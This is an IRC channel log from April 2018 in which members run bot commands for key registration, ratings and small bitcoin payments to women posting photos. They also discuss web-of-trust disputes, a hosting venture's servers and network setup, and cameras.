"touch" subjects are involved. 1802551;1524094340;sandi3;What goes on in here? Besides boobs 1802552;1524094345;ben_vulpes;!!invoice mircea_popescu 0.04221665 s.nsa rackspace march 18 2018 - june 30 2018 1802553;1524094349;mircea_popescu;sandi3, do you see the topic ? 1802554;1524094350;deedbot;Get your OTP: http://p.bvulpes.com/pastes/RJ4C0/?raw=true 1802555;1524094374;ben_vulpes;!!v 293D3D4C538FBB855768677F272C3EFA1403C85A2DD629A7A7171AF0DD565869 1802556;1524094377;deedbot;Invoiced mircea_popescu 0.04221665 << s.nsa rackspace march 18 2018 - june 30 2018 1802557;1524094385;sandi3;Yeah but, elevator pitch, do you have a quickie? 1802558;1524094392;mircea_popescu;ben_vulpes, everything with you is 4cents! 1802559;1524094397;Cassidy_;!!register http://p.bvulpes.com/pastes/lTuCD/?raw=true 1802560;1524094400;deedbot;9495BCC17499138FEEF725989A4E8742CB0A1195 registered as Cassidy_. 1802561;1524094402;ben_vulpes;mircea_popescu: i'm barely worth doubledatits 1802562;1524094406;Cassidy_;https://i.imgur.com/2h0DEZh.jpg 1802563;1524094408;mircea_popescu;sandi3, no, really, "You have reached the public forum of The Most Serene Republic, a terrorist organisation dedicated to the creation of a safe space for the elites to productively defect to, leaving the pantsuit stranded behind." 1802564;1524094453;sandi3;OMG lol, I am going to be on some list now 1802565;1524094475;mircea_popescu;sandi3, sure. topless entertainer of enemies of the state. 1802566;1524094481;mircea_popescu;!!pay Cassidy_ 0.02 1802567;1524094484;deedbot;Get your OTP: http://p.bvulpes.com/pastes/E6l33/?raw=true 1802568;1524094532;mircea_popescu;!!pay-invoice ben_vulpes 2 1802569;1524094537;mircea_popescu;!!pay-invoice ben_vulpes 3 1802570;1524094539;deedbot;Get your OTP: http://p.bvulpes.com/pastes/o96n3/?raw=true 1802571;1524094544;deedbot;Get your OTP: http://p.bvulpes.com/pastes/U6e9l/?raw=true 1802572;1524094645;mircea_popescu;sandi3, anyway, you can read the logs, like http://logs.bvulpes.com/trilema 1802573;1524094875;mircea_popescu;!!up sandi3 1802574;1524094875;deedbot;sandi3 voiced for 30 minutes. 1802575;1524094892;mircea_popescu;!!rate sandi3 undiscovered exhibitionist librarian. 1802576;1524094896;mircea_popescu;!!rate sandi3 1 undiscovered exhibitionist librarian. 1802577;1524094898;deedbot;Get your OTP: http://p.bvulpes.com/pastes/N4vWY/?raw=true 1802578;1524094929;sandi3;Oh wow lots of text 😆 1802579;1524094945;mircea_popescu;yes. you no longer need to read books, now. 1802580;1524095053;sandi3;Probably more interesting anyways, at least its current 1802581;1524095060;mircea_popescu;much more interesting. 1802582;1524095331;mircea_popescu;!up brooklyn 1802583;1524095424;mircea_popescu;!!up pheeby 1802584;1524095424;deedbot;pheeby voiced for 30 minutes. 1802585;1524095431;pheeby;tits for bits :) 1802586;1524095447;mircea_popescu;lel. 45847c65. 1802587;1524096259;pheeby;https://usercontent.irccloud-cdn.com/file/MDq8JA2L/image.jpg 1802588;1524097123;douchebag;!!up trinque 1802589;1524097124;deedbot;trinque voiced for 30 minutes. 1802590;1524097130;douchebag;!!up twointhepink 1802591;1524097131;deedbot;twointhepink voiced for 30 minutes. 1802592;1524097134;douchebag;my bad 1802593;1524097177;twointhepink;im here to show tits 1802594;1524097389;twointhepink;!!register http://p.bvulpes.com/pastes/uyBpj/?raw=true 1802595;1524097392;deedbot;2C0B3E389399B187B68758D19297713EA5C6C6C7 registered as twointhepink. 1802596;1524097507;douchebag;!!up BlingQueen 1802597;1524097508;deedbot;BlingQueen voiced for 30 minutes. 1802598;1524097540;BlingQueen;!!register http://p.bvulpes.com/pastes/EXlEZ/?raw=true 1802599;1524097543;deedbot;153D1A13AA91DB4AC7426578A70F80E6A659D276 registered as BlingQueen. 1802600;1524097566;BlingQueen;tits 4 bits cx 1802601;1524097941;douchebag;You have to wait for mircea_popescu to get back 1802602;1524097999;ben_vulpes;douchebag: just make up your own numbers 1802603;1524098020;douchebag;ill take the first four 8 digits of their PGP key 1802604;1524098134;mircea_popescu;eh wut. 1802605;1524098139;douchebag;mircea_popescu: 1802606;1524098143;douchebag;is that fine? 1802607;1524098146;mircea_popescu;no. 1802608;1524098151;douchebag;alright give me nums then 1802609;1524098152;ben_vulpes;ahahaha you thought i was serious?! 1802610;1524098166;mircea_popescu;twointhepink, 552252d9. 1802611;1524098200;mircea_popescu;BlingQueen, df80889a 1802612;1524098221;ben_vulpes;great self evidentiary 1802613;1524098290;mircea_popescu;!!pay pheeby 0.02 1802614;1524098295;deedbot;Get your OTP: http://p.bvulpes.com/pastes/aLCOY/?raw=true 1802615;1524098299;mircea_popescu;!!up pheeby 1802616;1524098299;deedbot;pheeby voiced for 30 minutes. 1802617;1524098318;mircea_popescu;!!up missmoon 1802618;1524098319;deedbot;missmoon voiced for 30 minutes. 1802619;1524098332;missmoon;Here for tots 1802620;1524098370;trinque;potato republic is down the hall 1802621;1524098418;ben_vulpes;trinque: the pizarro website is entirely pretty howdareye 1802622;1524098421;mircea_popescu;lol 1802623;1524098430;mircea_popescu;missmoon, 5150342d 1802624;1524098673;twointhepink;https://i.imgur.com/WCYkCQr.png 1802625;1524098716;mircea_popescu;!!pay twointhepink oneinthesink 1802626;1524098720;mircea_popescu;o oops i mean 1802627;1524098721;deedbot;Get your OTP: http://p.bvulpes.com/pastes/4KLVR/?raw=true 1802628;1524098723;mircea_popescu;!!pay twointhepink 0.02 1802629;1524098727;deedbot;Get your OTP: http://p.bvulpes.com/pastes/glWA4/?raw=true 1802630;1524098743;ben_vulpes;thewholekitchensinkinthepink 1802631;1524098788;mircea_popescu;twointhepink, do you know who mireille mathieu was ? 1802632;1524098810;twointhepink;no I do not 1802633;1524098873;mircea_popescu;https://www.youtube.com/watch?v=SIxOl1EraXA 1802634;1524098923;ben_vulpes;> All in all, the Mathieu household saw no more than 1,000 francs a month, and 190 francs had to be subtracted for the monthly rent 1802635;1524098933;ben_vulpes;s/1,000/1,800 1802636;1524098956;ben_vulpes;oh for rent of 1/10 pretax income 1802637;1524099043;mircea_popescu;ben_vulpes, this ustard style of paying > 5-10% for real estate scam is unknown in history. 1802638;1524099071;mircea_popescu;rent = 10% of income was huge, on account of "crazy paris expenses" 1802639;1524099146;ben_vulpes;i am familiar with this, also the 'tax of peasants was hilariously low as far as usgstani inmate is concerned' 1802640;1524099194;ben_vulpes;!!up ascii_lander 1802641;1524099194;deedbot;ascii_lander voiced for 30 minutes. 1802642;1524099218;ben_vulpes;ohey pizarro log cracked 1024 lines today 1802643;1524099226;mircea_popescu;but on the other hand, peasant ACTUALLY HAD TO MAKE the dough in question. wasn't just passive recipient of imaginary govt printouts. 1802644;1524099274;mircea_popescu;usg inmate, produces 0, eats epsilon, is taxed 0. french landslave produced epsilon, was taxed 10% epsilon, ate .9 epsilon. 1802645;1524099327;mircea_popescu;in fact, the whole tits for bits thing is 100% equivalent to entirety of usg economy. "show up for work". 1802646;1524099335;mircea_popescu;!!up BlingQueen 1802647;1524099336;deedbot;BlingQueen voiced for 30 minutes. 1802648;1524099447;*;ben_vulpes has only ever sought the right men to hump sacks of shit thither and yon for 1802649;1524099483;*;ben_vulpes pounds table, toasts lords, humps moar shit 1802650;1524099498;ckang;helping missmoon upload pic, something causes timeouts uploading, maybe QoS 1802651;1524099922;mircea_popescu;!!up Lelllaa 1802652;1524099923;deedbot;Lelllaa voiced for 30 minutes. 1802653;1524099931;Lelllaa;tits! 1802654;1524099947;mircea_popescu;Lelllaa, 77b3fe58. you got half hour. 1802655;1524099954;Lelllaa;!!register http://p.bvulpes.com/pastes/oTBjm/?raw=true 1802656;1524099955;*;mircea_popescu wonders how danielpbarron 's pministry is going. 1802657;1524099957;deedbot;B1203DA4E0F55D1E0EE26B20E3A6AD3EA186FF4F registered as Lelllaa. 1802658;1524100078;ben_vulpes;and since apparently we haven't done this one yet http://www.embassyofargentina.us/en/consular-section/reciprocity-fee-for-us-citizens.html 1802659;1524100110;ben_vulpes;and a grade-a adlai thread in #pizarro http://logs.bvulpes.com/pizarro?d=2018-4-18#339150 1802660;1524100110;mimisbrunnr;Logged on 2018-04-18 23:14 adlai: for the record: deedbot ate segwit dust. 1802661;1524100192;ckang;!!up missmoon 1802662;1524100192;deedbot;missmoon voiced for 30 minutes. 1802663;1524100206;missmoon;https://usercontent.irccloud-cdn.com/file/oHGjShi3/image.jpg 1802664;1524100228;ben_vulpes;nice kerning missmoon 1802665;1524100258;missmoon;What's that? 1802666;1524100268;mircea_popescu;the adjustment of letterface 1802667;1524100273;mircea_popescu;!!pay missmoon 0.02 1802668;1524100276;deedbot;Get your OTP: http://p.bvulpes.com/pastes/UwYJZ/?raw=true 1802669;1524100280;mircea_popescu;missmoon, what do you do for a living btw ? 1802670;1524100283;ben_vulpes;specifically the spacing 1802671;1524100334;missmoon;Oh, that's just normal writing for me 😍 1802672;1524100351;ben_vulpes;you'd be surprised at what comes through 1802673;1524100406;ben_vulpes;just separating the string into two equal-length sets puts you tits and shoulders above the crowd 1802674;1524100463;mircea_popescu;aaand in due time trilema produced titwrit coneisseurs, discerning and not easily satisfied. 1802675;1524100478;missmoon;Ive always wished I could write pretty 1802676;1524100478;mircea_popescu;as the guy said, aspects of civilisation require leisure. 1802677;1524100496;mircea_popescu;do they even have caligraphy classes still ? 1802678;1524100510;ben_vulpes;i enjoyed mine 1802679;1524100538;missmoon;Cursive is one thing they forced into us as kids, never use it though 1802680;1524100546;ben_vulpes;shit damn if i weren't running a radon test right now the whole neighborhood would be listening to mathieu 1802681;1524100556;ben_vulpes;missmoon: how do you even write at speed without cursive? 1802682;1524100567;mircea_popescu;by not writing at speed 1802683;1524100593;missmoon;I type :) 1802684;1524100601;ben_vulpes;quelle de luxe 1802685;1524100610;mircea_popescu;missmoon, here's something that might interest you : http://trilema.com/2017/of-ducks-and-lameness/ 1802686;1524100621;mircea_popescu;item even sold at auction! 1802687;1524100642;missmoon;I can read it find but most things I write are documents which require printed writing 1802688;1524101061;ckang;!!up debbydoesbits 1802689;1524101062;deedbot;debbydoesbits voiced for 30 minutes. 1802690;1524101079;debbydoesbits;Here for picture 1802691;1524101111;ckang;just wait for mircea_popescu 1802692;1524101334;mircea_popescu;http://btcbase.org/log/2018-04-19#1802659 << da fuck, you're selling space to ~actually negrated people~ now ?! 1802693;1524101334;a111;Logged on 2018-04-19 01:08 ben_vulpes: and a grade-a adlai thread in #pizarro http://logs.bvulpes.com/pizarro?d=2018-4-18#339150 1802694;1524101334;mimisbrunnr;Logged on 2018-04-18 23:14 adlai: for the record: deedbot ate segwit dust. 1802695;1524101347;mircea_popescu;debbydoesbits, cbe753f0. half hour. 1802696;1524101403;ascii_lander;mircea_popescu: iirc d00d was defrocked for being a bore, rather than for chicanery 1802697;1524101422;mircea_popescu;ben_vulpes, you'll have to have some words in that board of yours ; on one hand this is outright offensive, and im quite considering unrating you for it ; on the other hand ascii_lander can't be hurring about what people ~might~ do while you folk are out there dealing with the declared enemy. 1802698;1524101429;mircea_popescu;ascii_lander, a negrate is a negrate. 1802699;1524101459;mircea_popescu;if you're not going to enforce it we might just as well go home. 1802700;1524101503;ascii_lander;i did say before, 'really oughta trade in wot' 1802701;1524101527;ascii_lander;which imho mircea_popescu is right to say only includes folx with reasonably + , from our pov, rating 1802702;1524101579;ascii_lander;we're not really equipped to digest arbitrary amounts of bozoitude from bozo subscribers 1802703;1524101612;mircea_popescu;well i mean, you don't have a standard that's comprehensible from the oustide, as it stands now. 1802704;1524101647;ascii_lander;this is tru!! 1802705;1524101650;ascii_lander;ben_vulpes, mod6 ^ 1802706;1524101675;mircea_popescu;but in any possible read of this whole thing, it's ONE thing to say, "oh, you're new, here, register a key and i'll rate you 1 and now you're in the wot and all's well" amnd it's ANOTHER thing to say "well, someone negrated you but i think he's a moron anyway" 1802707;1524101717;ascii_lander;mircea_popescu: i gotta ask, why didja agree to sell the d00d his FGs then 1802708;1524101730;ascii_lander;if mircea_popescu has a firm 'no trading with negged bozos' concept 1802709;1524101740;douchebag;!!up Lelllaa 1802710;1524101740;deedbot;Lelllaa voiced for 30 minutes. 1802711;1524101810;mircea_popescu;ascii_lander, it's not a firm "no trading with bozos" ; seems to me you appreciate the distinction between selling an item and selling hosting in other contexts. people that are willing to take your cash payment upfront for a piece of hard candy might nevertheless not agree to rent you their garage. 1802712;1524101814;mircea_popescu;this is self-evident neh ? 1802713;1524101821;ascii_lander;oh yea 1802714;1524101835;ascii_lander;i haven't anyffing to disagree with then 1802715;1524101864;ascii_lander;ben_vulpes i must agree with mircea_popescu ; recommend to refund the d00d's fee 1802716;1524101907;ascii_lander;let him disguise himself as a +1 camgurl, to buy. 1802717;1524101967;ascii_lander;!!reputation adlai 1802718;1524101969;deedbot;http://p.bvulpes.com/pastes/eHEXm/?raw=true 1802719;1524102004;mircea_popescu;then wait three weeks, "discover" he http://btcbase.org/log/2018-04-18#1802143 pretended and negrate, and so on. 1802720;1524102004;a111;Logged on 2018-04-18 19:08 ascii_lander: http://btcbase.org/log/2018-04-18#1802047 << understand correctly, i dun give half a shit if he cleans the gurlz and eats'em. what i dun like is liars. why does the d00d have to pretend 'they are at my party'. 1802721;1524102016;mod6;yeah, i had no clue adlai was negrated. 1802722;1524102016;mircea_popescu;endless potential for lulz at idiots' expense with this wot thing. which is what it's for. 1802723;1524102020;mod6;DISQUALIFIED 1802724;1524102060;mod6;next! 1802725;1524102195;BingoBoingo;ascii_lander: I think the leftover pizza is still at your place 1802726;1524102239;debbydoesbits;https://usercontent.irccloud-cdn.com/file/L2BL5lWN/image.jpg 1802727;1524102267;mod6;There are 5 rockports still available (correct)? Laides and Lords of TMSR~: Reserve yours while they're still available! 1802728;1524102271;mircea_popescu;!!pay debbydoesbits 0.02 1802729;1524102278;deedbot;Get your OTP: http://p.bvulpes.com/pastes/mvhCC/?raw=true 1802730;1524102285;mod6;Need to be in good WoT standing ofc. 1802731;1524102372;ascii_lander;mod6: correct, 5 1802732;1524102413;mircea_popescu;ascii_lander, moving on to more interesting things, do we have any plans to put anything on the nsa spare ? or is it literally just to sit there unpowered indefinitely ? 1802733;1524102418;ascii_lander;BingoBoingo: wanna come for it ? 1802734;1524102440;ascii_lander;mircea_popescu: point of a spare is to fall over into if main box fails (my box has 1 ps, for instance) 1802735;1524102452;mircea_popescu;but then we keep it powered up ? 1802736;1524102454;ascii_lander;we do not currently have disks for either spare to be converted into a live machine 1802737;1524102458;ascii_lander;no it is not powered 1802738;1524102458;BingoBoingo;ascii_lander: I'm good. You are the one about to return to the PetroCheese State 1802739;1524102459;mircea_popescu;ah i see. 1802740;1524102462;ascii_lander;neither is the smg spare 1802741;1524102482;ascii_lander;they are simply stowed in the rack because the latter is nowhere near full, and is the most secure location to store'em in presently 1802742;1524102492;mircea_popescu;ascii_lander, the way i'm seeing it is, we can't really deny item to the pizarro folk, if indeed they sell out all the rest of their space and we're not using our box we'll kinda have to sell it to them. IF. 1802743;1524102505;ascii_lander;right, i dun disagree 1802744;1524102540;mircea_popescu;so i guess the good news is that there's an optionable machine if things get tight. esp we'll get a better idea later on how stable phuctor is etc. 1802745;1524102550;mod6;Well, we want you to have a spare. This helps S.NSA. However, ya, we can cross that bridge when we come to it. 1802746;1524102567;mircea_popescu;mod6, yeah. slack in the gears is good for all the gears. 1802747;1524102575;mod6;Yes, Sir. 1802748;1524102578;ascii_lander;we bought the smg spare as a guarantee that smg gets 24/365 service 1802749;1524102584;ckang;if a person falls below 0, how are their links in the WoT effected ? 1802750;1524102601;mircea_popescu;anyway, i must say your capacity has increased beautifully, you're one trip away from actually having enough gear to be able to cover costs, if it hasn'rt happened already, huh. 1802751;1524102607;mircea_popescu;time to hire someone to troll the forums ? 1802752;1524102622;mircea_popescu;ckang, depends "below zero from whom". it's a graph, you understand ? 1802753;1524102630;ascii_lander;mircea_popescu: if rockchip demand picks up, next load will be 100kg of rockchip 1802754;1524102632;mircea_popescu;eg, if deedbot sees you < 1, you can't !!up anymore. 1802755;1524102663;mircea_popescu;ascii_lander, mod6 ben_vulpes the above q is serious, btw. have someone represent you on digitalpoint / whatever hosting forums ? or you deem it premature ? 1802756;1524102665;ascii_lander;mircea_popescu: i have a ~automated process for bringing those up 1802757;1524102684;ascii_lander;mircea_popescu: possibly want to tap out the waiting i-want-a-box-itude of L1 1802758;1524102691;mircea_popescu;because either of these new fellows with ~proven~ godly patience dealing with whores could make a great asset for you. 1802759;1524102712;ben_vulpes;well working in reverse, BingoBoingo is already on payroll and i intend to put him to work in teh forums 1802760;1524102713;ascii_lander;i suspect that heathens will find our offering a bit on expensive side atm 1802761;1524102729;mircea_popescu;ben_vulpes, also works. 1802762;1524102747;mod6;mircea_popescu: From my perspective, things are starting to just come together, and agreed, nicely. Not premature, probably can discuss this over the weekend and see about starting in on such a thing next week. 1802763;1524102756;mircea_popescu;ben_vulpes, of course, it'll help if you have... a website :D 1802764;1524102763;mod6;ben_vulpes, ascii_lander, thoughts? 1802765;1524102765;ben_vulpes;mircea_popescu: praytell what do we have now 1802766;1524102771;mircea_popescu;but i guess hacking up some of the trip pics into a theme for pizarro mp-wp can be your pet project 1802767;1524102777;ckang;!!up lilmzthang 1802768;1524102777;deedbot;lilmzthang voiced for 30 minutes. 1802769;1524102793;lilmzthang;😛 1802770;1524102798;BingoBoingo; but i guess hacking up some of the trip pics into a theme for pizarro mp-wp can be your pet project << ascii_lander has been gathering quite the collection 1802771;1524102802;ascii_lander;i got some quite 'collectable' pics of various things being assembled 1802772;1524102809;mircea_popescu;mod6, yeah, for the first time it's getting to the point where sales rather than gear are the bottleneck. 1802773;1524102822;mircea_popescu;ascii_lander, BingoBoingo cool deal! 1802774;1524102831;mod6;I agree, we should get things into a bit of a landing page with availble products offered and some contact info, etc. The blog is great for announcements, statements, other effects tho. 1802775;1524102837;ascii_lander;i'ma do a 'best of' and give for pizarroblog 1802776;1524102844;lilmzthang;Came for picture 1802777;1524102845;ascii_lander;( and post a few myself ) 1802778;1524102855;mircea_popescu;mod6, i don't even think it can't be the blog. just you know, have buncha pics directly visible. 1802779;1524102860;mircea_popescu;blog supports a landing page model anyway. 1802780;1524102871;mircea_popescu;lilmzthang, 3af8cdbb. 1802781;1524102876;mod6;Oh, yeah the pics. Am looking forward to some of these. 1802782;1524102885;mod6;Speaking of which... did we resolve the camera issue? 1802783;1524102894;ascii_lander;mod6: ? 1802784;1524102896;BingoBoingo;Just keep the pics of the locals and their Mate Crackpipes off the site 1802785;1524102903;ascii_lander;lol 1802786;1524102908;mircea_popescu;i'm not saying, you know, "dump the thing you have", jesus christ. i am saying, use it. build on it. blog landing pages, why the hell not. 1802787;1524102910;ben_vulpes;stepping further upstack, i of course will defer to the senior statesmen mircea_popescu and ascii_lander should they demand i return adlai's coin, but i am direly loath to forego revenue, and do not much care from whom they come lest like douchebag they exhibit utter ignorance of and disregard for the variety speak 1802788;1524102911;mod6;BingoBoingo was in need of a camera so he could take better pics, etc. 1802789;1524102927;ascii_lander;mod6: nah i used an ~ok camera in pnoje , in the end 1802790;1524102928;ascii_lander;svga 1802791;1524102935;BingoBoingo;mod6: There are still the same cameras here. 1802792;1524102939;mircea_popescu;ben_vulpes, your choice is between how much revenue you wanna forego. 1802793;1524102951;ascii_lander;ben_vulpes: think re what mircea_popescu said, whole point of wot is to not do this 1802794;1524102959;BingoBoingo;^ 1802795;1524102973;ben_vulpes;i of course defer. 1802796;1524102976;ascii_lander;very modest amt of ecstacy, for a potentially unlimited pile of landry 1802797;1524102994;ascii_lander;*laundry 1802798;1524103014;mod6;I ruled already: <+mod6> DISQUALIFIED 1802799;1524103075;douchebag;Alright mircea_popescu, I'm done with these girls for tonight 1802800;1524103082;douchebag;not sure about ckang 1802801;1524103098;mircea_popescu;in unrelated news : i can't recommend the dsc-rx100 quite warmly enough. it's a splendid sony compact with zeiss lenses that's easily the best camera i ever saw. 1802802;1524103114;mircea_popescu;and they're neither heavy nor expensive. it's the first time i see a digicam that actually sees better than i do. 1802803;1524103117;ascii_lander;lol that's the thing ascii_lander left at home 1802804;1524103124;mircea_popescu;isn't it wonderful ? 1802805;1524103125;ascii_lander;(it... weighed toomuch!11) 1802806;1524103131;mircea_popescu;douchebag, cool. 1802807;1524103165;mircea_popescu;ascii_lander, i actually routinely use it to zoom in distant writing. nifty as fuck. 1802808;1524103168;*;ascii_lander had cut erry possible gram from the crates, to maximize useful payload 1802809;1524103200;*;ascii_lander has ~95% fill of max weight, for both trunks ~and~ 'carry on 1802810;1524103201;ascii_lander;' etc 1802811;1524103227;ckang;mircea_popescu: oh sorry, but say a person gets added to the WoT, then they trust 3 people 1802812;1524103247;ckang;if that person is 'downvoted' or untrusted by whoever trusted them initially 1802813;1524103258;ckang;what happens to the 3 people 1802814;1524103282;douchebag;mircea_popescu: In terms of my girls, the only one who needs to be proccessed is twointhepink 1802815;1524103296;BingoBoingo;They have to have done something to get own ratings or they become islands 1802816;1524103316;ckang;ohhh thats what i was wondering ;) 1802817;1524103325;mod6;what a great name 'twointhepink' 1802818;1524103360;douchebag;So if you wouldn't mind verifying her OTP 1802819;1524103373;douchebag;I just want to get her all set before I get going to bed 1802820;1524103645;BingoBoingo;http://btcbase.org/log/2018-04-18#1801964 << Nominally the main switch is capable of these things. I practice enabling these requires delicately ordered incantations I am hesistant to have executed on the production switch. It would require a second and someone with the hands to build a play network with with to test thoroughly before transplanting the config. 1802821;1524103645;a111;Logged on 2018-04-18 11:50 ckang: managed 1gbit switches with layer 3 arent too badly priced 1802822;1524103712;mod6;BingoBoingo: Yeah, indeed we'll want to set it up in a test network and ensure that it's 100% correct, then plan an outage. Whether we have alf build a thing, or we buy one or whatever. You're on the right track. 1802823;1524103729;ben_vulpes;mircea_popescu, mod6, ascii_lander: lest it rest unclear, the key in question'll not be leased hardware on my watch. 1802824;1524103742;*;ben_vulpes regrets the passive voice instantly 1802825;1524103745;ckang;curious to see if yall try that VyOS 1802826;1524103758;ckang;ive seen some neat stuff done with it 1802827;1524103809;ben_vulpes;mircea_popescu: how's shutter lag and low-light performance on the RX100? 1802828;1524103823;ben_vulpes;former is the greatest grit in my gears with nonslrs 1802829;1524103877;mod6;!~later tell jurov http://btcbase.org/log/2018-04-18#1801479 1802830;1524103877;a111;Logged on 2018-04-18 03:51 ben_vulpes: jurov: mod6 http://p.bvulpes.com/pastes/8L9fz/?raw=true 1802831;1524103877;jhvh1;mod6: The operation succeeded. 1802832;1524103894;mod6;(In case you didn't already see ^) 1802833;1524103899;BingoBoingo;mod6: If you want to pick up one to hack a test network together, my hands are rapidly filling and a physical backup for the thing is not a particularly high priority 1802834;1524103907;lilmzthang;https://usercontent.irccloud-cdn.com/file/bMHWrIUv/image.jpg 1802835;1524103947;ckang;i actually got a few i350's here to install tomorrow 1802836;1524103997;mod6;BingoBoingo: We'll have to discuss. I could pick something up maybe... not sure about the config/testing myself. But next problem is, how to get it there. 1802837;1524104026;BingoBoingo;mod6: It doesn't need to be here. Config can be loaded from here if we have a good one 1802838;1524104037;mod6;Oh, I see. 1802839;1524104054;ben_vulpes;holy crap lilmzthang those letters are downright legible 1802840;1524104089;mod6;yeah, that's nice 1802841;1524104094;lilmzthang;I used the auto adjust and they popped 1802842;1524104206;lilmzthang;Ooo, just noticed my arm tat looks brand new too 1802843;1524104223;ben_vulpes;imagine, if you lived online you could photoshop yourself into youth well into your thirties 1802844;1524104271;BingoBoingo; imagine, if you lived online you could photoshop yourself into youth well into your thirties << As alf can attest there are specimines here who manage something similar to that by avoiding the mate crack pipe 1802845;1524104297;ascii_lander;verily 1802846;1524104298;ben_vulpes;BingoBoingo: i doubt the causative link you pustulate 1802847;1524104326;lilmzthang;Oh I can't do all that, but I can move the sliders around and press auto adjust 😁 1802848;1524104343;BingoBoingo;ben_vulpes: Alf has seen the parkinsonian gait and supports the crack pipe hypothesis having had time to see the evidence 1802849;1524104366;BingoBoingo;The young suck the crackpipes and turn into lead solder mote zombies 1802850;1524104374;BingoBoingo;*mate zombies 1802851;1524104385;ben_vulpes;not'te mate then 1802852;1524104407;ben_vulpes;'tis a fine caffeine vehicle on its own; heavy metal poisoning its own thing. 1802853;1524104419;BingoBoingo;Actual sterling silver brazed bombilla pipes would likely be fine, if they could be found 1802854;1524104469;ben_vulpes;or stainless, excuse me i have to go unstick my eyes from all the rolling back in my head i can't keep them from 1802855;1524104481;BingoBoingo;Also the number of Mums cases in the cowork is now at 10 1802856;1524104524;BingoBoingo;It's an acidic and astringent prison tea. Stainless is only stainless for so long. 1802857;1524104537;mircea_popescu;ckang, as far as the people outside are concerned, they're no longer trusted. 1802858;1524104550;ckang;so they need to make links with others 1802859;1524104553;ckang;to stay in 1802860;1524104557;mircea_popescu;pretty much yeah 1802861;1524104561;mircea_popescu;douchebag, aite, a moment 1802862;1524104579;BingoBoingo;ckang: Ideally they make the effort to do that before they get stranded 1802863;1524104626;mircea_popescu;!!up sandi3 1802864;1524104626;deedbot;sandi3 voiced for 30 minutes. 1802865;1524104635;mircea_popescu;you can self voice btw, say !!up to deedbot in pm 1802866;1524104747;BingoBoingo;!!up trinax 1802867;1524104747;deedbot;trinax voiced for 30 minutes. 1802868;1524104758;trinax;😊 1802869;1524104759;BingoBoingo;trinax: Who is your daddy and what does he do? 1802870;1524104779;trinax;I don't know but if you find him tell him I said hi 1802871;1524104793;BingoBoingo;[emoji: Medium dark female jugde shitting in a bucket] 1802872;1524104822;trinax;I am here for photograph 1802873;1524104826;ben_vulpes;https://www.marketwatch.com/story/suspect-in-iceland-bitcoin-mining-heist-breaks-out-of-prison-escapes-country-2018-04-18 << turns out you can walk out of icelandic prison and onto a plane 1802874;1524104843;BingoBoingo;trinax: mircea_popescu should be awake eventually 1802875;1524104869;trinax;Awesome 1802876;1524104897;douchebag;mircea_popescu: thanks man 1802877;1524105881;mircea_popescu;lol photograph. 1802878;1524105886;mircea_popescu;trinax, ab9efd21. half hour. 1802879;1524105920;mod6;Annnnd sold. mod6 is gonna get a rockport. 1802880;1524105951;mod6;Down to 4 available folks. 1802881;1524105958;ascii_lander;ha 1802882;1524105968;mircea_popescu;http://btcbase.org/log/2018-04-19#1802822 << the good news is that the test doesn't have to be in uy. 1802883;1524105968;a111;Logged on 2018-04-19 02:08 mod6: BingoBoingo: Yeah, indeed we'll want to set it up in a test network and ensure that it's 100% correct, then plan an outage. Whether we have alf build a thing, or we buy one or whatever. You're on the right track. 1802884;1524105999;ascii_lander;iirc i recommended this : for rockchip users: buy 1 to test on at home, then upload yer image 1802885;1524106010;ascii_lander;( i'ma post the 'standard' image, when i get home ) 1802886;1524106023;mircea_popescu;http://btcbase.org/log/2018-04-19#1802827 << i don't usually do shutter-lag sorta stuff ; low light is fine, but then again im tolerant. 1802887;1524106023;a111;Logged on 2018-04-19 02:10 ben_vulpes: mircea_popescu: how's shutter lag and low-light performance on the RX100? 1802888;1524106099;mircea_popescu;ben_vulpes, anyway, my usercase is pocket camera. if one wants to shoot movement in a cubic foot on a table at home, that'd conceivably be a diff cam. 1802889;1524106209;mod6;ahem "rockchip" : https://imgflip.com/i/28nzg6 1802890;1524106243;mircea_popescu;lol 1802891;1524106250;mircea_popescu;iirc spyked was getting one too 1802892;1524106283;ascii_lander;ben_vulpes is now equipped with errything he needs to deliver the rockboxen to customers immediately. 1802893;1524106290;ascii_lander;( or whenever he wakes up ) 1802894;1524106346;mircea_popescu;!!u[ lilmzthang 1802895;1524106350;mircea_popescu;!!up lilmzthang 1802896;1524106350;deedbot;lilmzthang voiced for 30 minutes. 1802897;1524106375;mircea_popescu;doesn't she carry a frown worth a thousand bucks. what do you do for a living lilmzthang , accounts collecting ? 1802898;1524106381;mircea_popescu;!!pau lilmzthang 0.02 1802899;1524106411;mircea_popescu;!!pay lilmzthang 0.02 1802900;1524106416;deedbot;Get your OTP: http://p.bvulpes.com/pastes/X1IKc/?raw=true 1802901;1524106458;ckang;she might have stepped out i can try and get her back, give me a min 1802902;1524106469;ascii_lander;phunphakt: rockboxen live in an iron micro-rack junkyard-machined by ascii_lander on the day prior to trip, bent in transit, then hammered back into shape by ascii_lander and BingoBoingo 1802903;1524106500;BingoBoingo;Turns out I packed the right hammer when I chase a 12 oz claw for my bag so many months ago 1802904;1524106514;mod6;Get it bronzed. 1802905;1524106521;ascii_lander;lol 1802906;1524106638;BingoBoingo;I honestly don't think alf did a less than 15 km day here with yesterday being the short one. The others are all easily over 20 km 1802907;1524106676;ckang;!!up trinax 1802908;1524106677;deedbot;trinax voiced for 30 minutes. 1802909;1524106685;trinax;https://usercontent.irccloud-cdn.com/file/n4FUWPtB/image.jpg 1802910;1524106818;trinax;Sorry marker didn't want to spit ink very well 1802911;1524106821;mircea_popescu;http://btcbase.org/log/2018-04-19#1802873 << bitcoin corrupts universally. 1802912;1524106821;a111;Logged on 2018-04-19 02:27 ben_vulpes: https://www.marketwatch.com/story/suspect-in-iceland-bitcoin-mining-heist-breaks-out-of-prison-escapes-country-2018-04-18 << turns out you can walk out of icelandic prison and onto a plane 1802913;1524106833;hanbot;so, on this gentoo (4.9.76), i made a user, give it a homedir, it can happily ls files owned by root, checking out /etc like nobody's business, wtf. 1802914;1524106848;mircea_popescu;the hope of "enforcement" by fiatdorks against bitcoin people just became ~0. 1802915;1524106859;mircea_popescu;hanbot, ew. 1802916;1524106877;mircea_popescu;is this your blog ? 1802917;1524106888;hanbot;nop 1802918;1524106919;mircea_popescu;!!pay trinax 0.02 1802919;1524106924;deedbot;Get your OTP: http://p.bvulpes.com/pastes/rbZFZ/?raw=true 1802920;1524106940;trinax;Thnx luv 1802921;1524106952;mod6;hanbot: typically things like /etc are chmod 755. "Others can read and execute" by default. 1802922;1524106956;mircea_popescu;trinax, cheers. 1802923;1524106982;mircea_popescu;hanbot, yeah, how about something like /proc or i guess /var /usr etc 